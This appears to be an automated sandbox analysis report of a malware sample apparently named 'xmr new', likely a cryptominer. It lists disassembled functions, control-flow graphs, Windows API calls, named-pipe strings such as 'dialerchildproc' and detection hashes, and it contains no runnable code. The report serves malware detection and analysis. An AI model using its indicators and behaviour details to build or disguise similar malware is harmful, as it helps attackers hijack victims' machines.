                          • Instruction ID: 3afed94fe1932683d9cb87716e517d54191ff98dd7d33d4894b132dade25bd57
                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                          • Instruction Fuzzy Hash: 0F81C1316802C186F654BF6598733DF62E3EB45F80F588427EF0543796DB38C8A9878A
                          Function 0000012C42A8CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 254 12c42a8ce28-12c42a8ce4a GetLastError 255 12c42a8ce69-12c42a8ce74 FlsSetValue 254->255 256 12c42a8ce4c-12c42a8ce57 FlsGetValue 254->256 257 12c42a8ce76-12c42a8ce79 255->257 258 12c42a8ce7b-12c42a8ce80 255->258 259 12c42a8ce59-12c42a8ce61 256->259 260 12c42a8ce63 256->260 261 12c42a8ced5-12c42a8cee0 SetLastError 257->261 262 12c42a8ce85 call 12c42a8d6cc 258->262 259->261 260->255 263 12c42a8cef5-12c42a8cf0b call 12c42a8c748 261->263 264 12c42a8cee2-12c42a8cef4 261->264 265 12c42a8ce8a-12c42a8ce96 262->265 276 12c42a8cf28-12c42a8cf33 FlsSetValue 263->276 277 12c42a8cf0d-12c42a8cf18 FlsGetValue 263->277 267 12c42a8cea8-12c42a8ceb2 FlsSetValue 265->267 268 12c42a8ce98-12c42a8ce9f FlsSetValue 265->268 271 12c42a8ceb4-12c42a8cec4 FlsSetValue 267->271 272 12c42a8cec6-12c42a8ced0 call 12c42a8cb94 call 12c42a8d744 267->272 270 12c42a8cea1-12c42a8cea6 call 12c42a8d744 268->270 270->257 271->270 272->261 282 12c42a8cf35-12c42a8cf3a 276->282 283 12c42a8cf98-12c42a8cf9f call 12c42a8c748 276->283 280 12c42a8cf1a-12c42a8cf1e 277->280 281 12c42a8cf22 277->281 280->283 285 12c42a8cf20 280->285 281->276 287 12c42a8cf3f call 12c42a8d6cc 282->287 288 12c42a8cf8f-12c42a8cf97 285->288 290 12c42a8cf44-12c42a8cf50 287->290 291 12c42a8cf62-12c42a8cf6c FlsSetValue 290->291 292 12c42a8cf52-12c42a8cf59 FlsSetValue 290->292 293 12c42a8cf6e-12c42a8cf7e FlsSetValue 291->293 294 12c42a8cf80-12c42a8cf8a call 12c42a8cb94 call 12c42a8d744 291->294 295 12c42a8cf5b-12c42a8cf60 call 12c42a8d744 292->295 293->295 294->288 295->283
                          APIs
                          • GetLastError.KERNEL32 ref: 0000012C42A8CE37
                          • FlsGetValue.KERNEL32(?,?,?,0000012C42A90A6B,?,?,?,0000012C42A9045C,?,?,?,0000012C42A8C84F), ref: 0000012C42A8CE4C
                          • FlsSetValue.KERNEL32(?,?,?,0000012C42A90A6B,?,?,?,0000012C42A9045C,?,?,?,0000012C42A8C84F), ref: 0000012C42A8CE6D
                          • FlsSetValue.KERNEL32(?,?,?,0000012C42A90A6B,?,?,?,0000012C42A9045C,?,?,?,0000012C42A8C84F), ref: 0000012C42A8CE9A
                          • FlsSetValue.KERNEL32(?,?,?,0000012C42A90A6B,?,?,?,0000012C42A9045C,?,?,?,0000012C42A8C84F), ref: 0000012C42A8CEAB
                          • FlsSetValue.KERNEL32(?,?,?,0000012C42A90A6B,?,?,?,0000012C42A9045C,?,?,?,0000012C42A8C84F), ref: 0000012C42A8CEBC
                          • SetLastError.KERNEL32 ref: 0000012C42A8CED7
                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,0000012C42A90A6B,?,?,?,0000012C42A9045C,?,?,?,0000012C42A8C84F), ref: 0000012C42A8CF0D
                          • FlsSetValue.KERNEL32(?,?,00000001,0000012C42A8ECCC,?,?,?,?,0000012C42A8BF9F,?,?,?,?,?,0000012C42A87AB0), ref: 0000012C42A8CF2C
                            • Part of subcall function 0000012C42A8D6CC: HeapAlloc.KERNEL32 ref: 0000012C42A8D721
                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000012C42A90A6B,?,?,?,0000012C42A9045C,?,?,?,0000012C42A8C84F), ref: 0000012C42A8CF54
                            • Part of subcall function 0000012C42A8D744: HeapFree.KERNEL32 ref: 0000012C42A8D75A
                            • Part of subcall function 0000012C42A8D744: GetLastError.KERNEL32 ref: 0000012C42A8D764
                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000012C42A90A6B,?,?,?,0000012C42A9045C,?,?,?,0000012C42A8C84F), ref: 0000012C42A8CF65
                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000012C42A90A6B,?,?,?,0000012C42A9045C,?,?,?,0000012C42A8C84F), ref: 0000012C42A8CF76
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: Value$ErrorLast$Heap$AllocFree
                          • String ID:
                          • API String ID: 570795689-0
                          • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                          • Instruction ID: 4ed26be3c186423fa5eb1a0fc6ab54651fefbe7a9a50c6c12d2f89376e73f80e
                          • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                          • Instruction Fuzzy Hash: 50415B302C16C441FA6CB73555773EF6283DF847B0F540727AF36966E6DA6888368A82
                          Function 0000012C42A82244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                          • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                          • API String ID: 2171963597-1373409510
                          • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                          • Instruction ID: 1eb21a33f285ff42c9f83246a180badd5b5f03765cb9ae187fb58a29b6585959
                          • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                          • Instruction Fuzzy Hash: 83217132654B8082FB10AB25F4653AE73A2F784BA4F544616EF5903BA8DF3CC159CB41
                          Function 0000012C42A39944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 399 12c42a39944-12c42a399ac call 12c42a3a814 402 12c42a39e13-12c42a39e1b call 12c42a3bb48 399->402 403 12c42a399b2-12c42a399b5 399->403 403->402 404 12c42a399bb-12c42a399c1 403->404 406 12c42a39a90-12c42a39aa2 404->406 407 12c42a399c7-12c42a399cb 404->407 409 12c42a39d63-12c42a39d67 406->409 410 12c42a39aa8-12c42a39aac 406->410 407->406 411 12c42a399d1-12c42a399dc 407->411 412 12c42a39da0-12c42a39daa call 12c42a38a34 409->412 413 12c42a39d69-12c42a39d70 409->413 410->409 414 12c42a39ab2-12c42a39abd 410->414 411->406 415 12c42a399e2-12c42a399e7 411->415 412->402 427 12c42a39dac-12c42a39dcb call 12c42a36d40 412->427 413->402 416 12c42a39d76-12c42a39d9b call 12c42a39e1c 413->416 414->409 418 12c42a39ac3-12c42a39aca 414->418 415->406 419 12c42a399ed-12c42a399f7 call 12c42a38a34 415->419 416->412 423 12c42a39ad0-12c42a39b07 call 12c42a38e10 418->423 424 12c42a39c94-12c42a39ca0 418->424 419->427 430 12c42a399fd-12c42a39a28 call 12c42a38a34 * 2 call 12c42a39124 419->430 423->424 435 12c42a39b0d-12c42a39b15 423->435 424->412 428 12c42a39ca6-12c42a39caa 424->428 432 12c42a39cac-12c42a39cb8 call 12c42a390e4 428->432 433 12c42a39cba-12c42a39cc2 428->433 467 12c42a39a2a-12c42a39a2e 430->467 468 12c42a39a48-12c42a39a52 call 12c42a38a34 430->468 432->433 443 12c42a39cdb-12c42a39ce3 432->443 433->412 434 12c42a39cc8-12c42a39cd5 call 12c42a38cb4 433->434 434->412 434->443 440 12c42a39b19-12c42a39b4b 435->440 445 12c42a39b51-12c42a39b5c 440->445 446 12c42a39c87-12c42a39c8e 440->446 448 12c42a39df6-12c42a39e12 call 12c42a38a34 * 2 call 12c42a3baa8 443->448 449 12c42a39ce9-12c42a39ced 443->449 445->446 450 12c42a39b62-12c42a39b7b 445->450 446->424 446->440 448->402 452 12c42a39cef-12c42a39cfe call 12c42a390e4 449->452 453 12c42a39d00 449->453 454 12c42a39b81-12c42a39bc6 call 12c42a390f8 * 2 450->454 455 12c42a39c74-12c42a39c79 450->455 463 12c42a39d03-12c42a39d0d call 12c42a3a8ac 452->463 453->463 480 12c42a39c04-12c42a39c0a 454->480 481 12c42a39bc8-12c42a39bee call 12c42a390f8 call 12c42a3a038 454->481 460 12c42a39c84 455->460 460->446 463->412 478 12c42a39d13-12c42a39d61 call 12c42a38d44 call 12c42a38f50 463->478 467->468 472 12c42a39a30-12c42a39a3b 467->472 468->406 484 12c42a39a54-12c42a39a74 call 12c42a38a34 * 2 call 12c42a3a8ac 468->484 472->468 477 12c42a39a3d-12c42a39a42 472->477 477->402 477->468 478->412 486 12c42a39c0c-12c42a39c10 480->486 487 12c42a39c7b 480->487 499 12c42a39bf0-12c42a39c02 481->499 500 12c42a39c15-12c42a39c72 call 12c42a39870 481->500 505 12c42a39a76-12c42a39a80 call 12c42a3a99c 484->505 506 12c42a39a8b 484->506 486->454 492 12c42a39c80 487->492 492->460 499->480 499->481 500->492 509 12c42a39df0-12c42a39df5 call 12c42a3baa8 505->509 510 12c42a39a86-12c42a39def call 12c42a386ac call 12c42a3a3f4 call 12c42a388a0 505->510 506->406 509->448 510->509
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2216953707.0000012C42A30000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000012C42A30000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a30000_xmr new.jbxd
                          Similarity
                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                          • String ID: csm$csm$csm
                          • API String ID: 849930591-393685449
                          • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                          • Instruction ID: 7f3ffcbb88a06e9c3ed21bfce5406524e7c832041270061785eaa6f89815ac13
                          • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                          • Instruction Fuzzy Hash: D0E1BE32A44B818AFB60EF25D4923DE77A2F745B88F100117EF8957B99CB34D1A1C786
                          Function 0000012C42A8A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 520 12c42a8a544-12c42a8a5ac call 12c42a8b414 523 12c42a8a5b2-12c42a8a5b5 520->523 524 12c42a8aa13-12c42a8aa1b call 12c42a8c748 520->524 523->524 525 12c42a8a5bb-12c42a8a5c1 523->525 528 12c42a8a5c7-12c42a8a5cb 525->528 529 12c42a8a690-12c42a8a6a2 525->529 528->529 532 12c42a8a5d1-12c42a8a5dc 528->532 530 12c42a8a6a8-12c42a8a6ac 529->530 531 12c42a8a963-12c42a8a967 529->531 530->531 535 12c42a8a6b2-12c42a8a6bd 530->535 533 12c42a8a969-12c42a8a970 531->533 534 12c42a8a9a0-12c42a8a9aa call 12c42a89634 531->534 532->529 536 12c42a8a5e2-12c42a8a5e7 532->536 533->524 538 12c42a8a976-12c42a8a99b call 12c42a8aa1c 533->538 534->524 548 12c42a8a9ac-12c42a8a9cb call 12c42a87940 534->548 535->531 540 12c42a8a6c3-12c42a8a6ca 535->540 536->529 537 12c42a8a5ed-12c42a8a5f7 call 12c42a89634 536->537 537->548 551 12c42a8a5fd-12c42a8a628 call 12c42a89634 * 2 call 12c42a89d24 537->551 538->534 541 12c42a8a894-12c42a8a8a0 540->541 542 12c42a8a6d0-12c42a8a707 call 12c42a89a10 540->542 541->534 549 12c42a8a8a6-12c42a8a8aa 541->549 542->541 556 12c42a8a70d-12c42a8a715 542->556 553 12c42a8a8ba-12c42a8a8c2 549->553 554 12c42a8a8ac-12c42a8a8b8 call 12c42a89ce4 549->554 588 12c42a8a648-12c42a8a652 call 12c42a89634 551->588 589 12c42a8a62a-12c42a8a62e 551->589 553->534 555 12c42a8a8c8-12c42a8a8d5 call 12c42a898b4 553->555 554->553 564 12c42a8a8db-12c42a8a8e3 554->564 555->534 555->564 562 12c42a8a719-12c42a8a74b 556->562 566 12c42a8a887-12c42a8a88e 562->566 567 12c42a8a751-12c42a8a75c 562->567 569 12c42a8a9f6-12c42a8aa12 call 12c42a89634 * 2 call 12c42a8c6a8 564->569 570 12c42a8a8e9-12c42a8a8ed 564->570 566->541 566->562 567->566 571 12c42a8a762-12c42a8a77b 567->571 569->524 573 12c42a8a8ef-12c42a8a8fe call 12c42a89ce4 570->573 574 12c42a8a900 570->574 575 12c42a8a874-12c42a8a879 571->575 576 12c42a8a781-12c42a8a7c6 call 12c42a89cf8 * 2 571->576 584 12c42a8a903-12c42a8a90d call 12c42a8b4ac 573->584 574->584 580 12c42a8a884 575->580 602 12c42a8a804-12c42a8a80a 576->602 603 12c42a8a7c8-12c42a8a7ee call 12c42a89cf8 call 12c42a8ac38 576->603 580->566 584->534 599 12c42a8a913-12c42a8a961 call 12c42a89944 call 12c42a89b50 584->599 588->529 601 12c42a8a654-12c42a8a674 call 12c42a89634 * 2 call 12c42a8b4ac 588->601 589->588 593 12c42a8a630-12c42a8a63b 589->593 593->588 598 12c42a8a63d-12c42a8a642 593->598 598->524 598->588 599->534 626 12c42a8a676-12c42a8a680 call 12c42a8b59c 601->626 627 12c42a8a68b 601->627 608 12c42a8a87b 602->608 609 12c42a8a80c-12c42a8a810 602->609 620 12c42a8a815-12c42a8a872 call 12c42a8a470 603->620 621 12c42a8a7f0-12c42a8a802 603->621 613 12c42a8a880 608->613 609->576 613->580 620->613 621->602 621->603 630 12c42a8a686-12c42a8a9ef call 12c42a892ac call 12c42a8aff4 call 12c42a894a0 626->630 631 12c42a8a9f0-12c42a8a9f5 call 12c42a8c6a8 626->631 627->529 630->631 631->569
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                          • String ID: csm$csm$csm
                          • API String ID: 849930591-393685449
                          • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                          • Instruction ID: 676c2d1a8afc96c360d575e9c3168504a8b1671d6b2dbcdb9d2a1d591c9f8cf0
                          • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                          • Instruction Fuzzy Hash: 62E180726447C08AFB20EF65D4523DE77A6FB45798F100116EF8957B9ACB38D0A2C782
                          Function 0000012C42A8F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 641 12c42a8f394-12c42a8f3e6 642 12c42a8f4d7 641->642 643 12c42a8f3ec-12c42a8f3ef 641->643 644 12c42a8f4d9-12c42a8f4f5 642->644 645 12c42a8f3f9-12c42a8f3fc 643->645 646 12c42a8f3f1-12c42a8f3f4 643->646 647 12c42a8f4bc-12c42a8f4cf 645->647 648 12c42a8f402-12c42a8f411 645->648 646->644 647->642 649 12c42a8f421-12c42a8f440 LoadLibraryExW 648->649 650 12c42a8f413-12c42a8f416 648->650 653 12c42a8f4f6-12c42a8f50b 649->653 654 12c42a8f446-12c42a8f44f GetLastError 649->654 651 12c42a8f516-12c42a8f525 GetProcAddress 650->651 652 12c42a8f41c 650->652 657 12c42a8f4b5 651->657 658 12c42a8f527-12c42a8f54e 651->658 655 12c42a8f4a8-12c42a8f4af 652->655 653->651 656 12c42a8f50d-12c42a8f510 FreeLibrary 653->656 659 12c42a8f496-12c42a8f4a0 654->659 660 12c42a8f451-12c42a8f468 call 12c42a8c928 654->660 655->648 655->657 656->651 657->647 658->644 659->655 660->659 663 12c42a8f46a-12c42a8f47e call 12c42a8c928 660->663 663->659 666 12c42a8f480-12c42a8f494 LoadLibraryExW 663->666 666->653 666->659
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: AddressFreeLibraryProc
                          • String ID: api-ms-$ext-ms-
                          • API String ID: 3013587201-537541572
                          • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                          • Instruction ID: 2c88a65323b5f662659b879fcba8249b74b5637199f3fdebb6316d1bfa59371c
                          • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                          • Instruction Fuzzy Hash: 34410632351A8151FA16EB16A8267DF2393FB44BE0F5945279F0A87784EE38C4668392
                          Function 0000012C42A8104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 667 12c42a8104c-12c42a810b9 RegQueryInfoKeyW 668 12c42a811b5-12c42a811d0 667->668 669 12c42a810bf-12c42a810c9 667->669 669->668 670 12c42a810cf-12c42a8111f RegEnumValueW 669->670 671 12c42a811a5-12c42a811af 670->671 672 12c42a81125-12c42a8112a 670->672 671->668 671->670 672->671 673 12c42a8112c-12c42a81135 672->673 674 12c42a81147-12c42a8114c 673->674 675 12c42a81137 673->675 676 12c42a81199-12c42a811a3 674->676 677 12c42a8114e-12c42a81193 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 674->677 678 12c42a8113b-12c42a8113f 675->678 676->671 677->676 678->671 679 12c42a81141-12c42a81145 678->679 679->674 679->678
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                          • String ID: d
                          • API String ID: 3743429067-2564639436
                          • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                          • Instruction ID: 760965092377fb4adc3a08c7586275374c8e757d1a8fcd1bec86bc6be14be78d
                          • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                          • Instruction Fuzzy Hash: 0D414B32614BC486E760DF21E4593AE77A2F388B98F44812ADF8A07B58DF38C459CB41
                          Function 0000012C42A8D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • FlsGetValue.KERNEL32(?,?,?,0000012C42A8C7DE,?,?,?,?,?,?,?,?,0000012C42A8CF9D,?,?,00000001), ref: 0000012C42A8D087
                          • FlsSetValue.KERNEL32(?,?,?,0000012C42A8C7DE,?,?,?,?,?,?,?,?,0000012C42A8CF9D,?,?,00000001), ref: 0000012C42A8D0A6
                          • FlsSetValue.KERNEL32(?,?,?,0000012C42A8C7DE,?,?,?,?,?,?,?,?,0000012C42A8CF9D,?,?,00000001), ref: 0000012C42A8D0CE
                          • FlsSetValue.KERNEL32(?,?,?,0000012C42A8C7DE,?,?,?,?,?,?,?,?,0000012C42A8CF9D,?,?,00000001), ref: 0000012C42A8D0DF
                          • FlsSetValue.KERNEL32(?,?,?,0000012C42A8C7DE,?,?,?,?,?,?,?,?,0000012C42A8CF9D,?,?,00000001), ref: 0000012C42A8D0F0
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: Value
                          • String ID: 1%$Y%
                          • API String ID: 3702945584-1395475152
                          • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                          • Instruction ID: 4f76f3cc8ebdb3dcc42fa4363b001678604c658079b9374f96d3221b4c91fd4b
                          • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                          • Instruction Fuzzy Hash: 32116D30684AC441FA68B73565773EF6153DF843F0F5443369E3A976DADA68C4238282
                          Function 0000012C42A87510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                          • String ID:
                          • API String ID: 190073905-0
                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                          • Instruction ID: e14f6248c28123d33cbaabb309b265c3305b7a2736bebeaa0ed282603e2a38b8
                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                          • Instruction Fuzzy Hash: E581A2386802C186FA54BB679C733EF6293EB45B80F1844A79F4547796EB38C46787C2
                          Function 0000012C42A89DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: Library$Load$AddressErrorFreeLastProc
                          • String ID: api-ms-
                          • API String ID: 2559590344-2084034818
                          • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                          • Instruction ID: e2e3f91595bdee96af2ee3062ec5c75aa6f84a48478709663796f5becd8c8140
                          • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                          • Instruction Fuzzy Hash: 0B31E732352781D1FE11FB02A5227DE2696FB48BA0F590927DF1E07790DF38C4668796
                          Function 0000012C42A93DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                          • String ID: CONOUT$
                          • API String ID: 3230265001-3130406586
                          • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                          • Instruction ID: b84fd1c5d0e28faa360a00c65425da7c565ad9ae7b2bfcbd07e15caa41d9dbbc
                          • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                          • Instruction Fuzzy Hash: DB118131250A8082F750AB13E86535EA7A6FB88FE4F184616EF19877A4CB38C4248B81
                          Function 0000012C42A83790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: CurrentProcessProtectVirtual$HandleModule
                          • String ID: wr
                          • API String ID: 1092925422-2678910430
                          • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                          • Instruction ID: 0a086ebb96fc1af9a6e97ed6a5e9533a460bb44902e6c03c5c81d4fcbb3732d2
                          • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                          • Instruction Fuzzy Hash: D3115E3674478182FF14AB12E4256AEA2A2FB48F85F48442ADF8907754EF3DC516C745
                          Function 0000012C42A85B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: Thread$Current$Context
                          • String ID:
                          • API String ID: 1666949209-0
                          • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                          • Instruction ID: 5b89a599962f546c22f3cbf455a3cafc1a5b9c925d440eb7926f9e0b9e9d88f6
                          • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                          • Instruction Fuzzy Hash: 07D17676245B8882EA70AB06E4A539F77A1F788B84F110117EFCD47BA5DF38C561CB81
                          Function 0000012C42A82F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocFree
                          • String ID: dialer
                          • API String ID: 756756679-3528709123
                          • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                          • Instruction ID: 5dbd69ec98a744c86b0f80f098f1e64e70ed06da052b2154bee357fe9c8ca8d4
                          • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                          • Instruction Fuzzy Hash: 6031BF32741BD182FB10EF16A5667AFA7A2FB44B84F0844229F4847B55EF34C8B6C781
                          Function 0000012C42A8CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: Value$ErrorLast
                          • String ID:
                          • API String ID: 2506987500-0
                          • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                          • Instruction ID: 813613f83cbce4da28114097403ffca210a6fe5f7a263672513748d064f1e386
                          • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                          • Instruction Fuzzy Hash: 53118E302806C041FA68B33165773AF6153EF847F0F540727AF36976D6DE6888338682
                          Function 0000012C42A8199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                          • String ID:
                          • API String ID: 517849248-0
                          • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                          • Instruction ID: b23167ff50555e8e02f2993d7f19ad741d1cdbd885f5b7be149600ee3342f79c
                          • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                          • Instruction Fuzzy Hash: F9015B31740A8082FA10EB53E46939EA3A2FB88FC0F584436DF9943754DE3CC55AC781
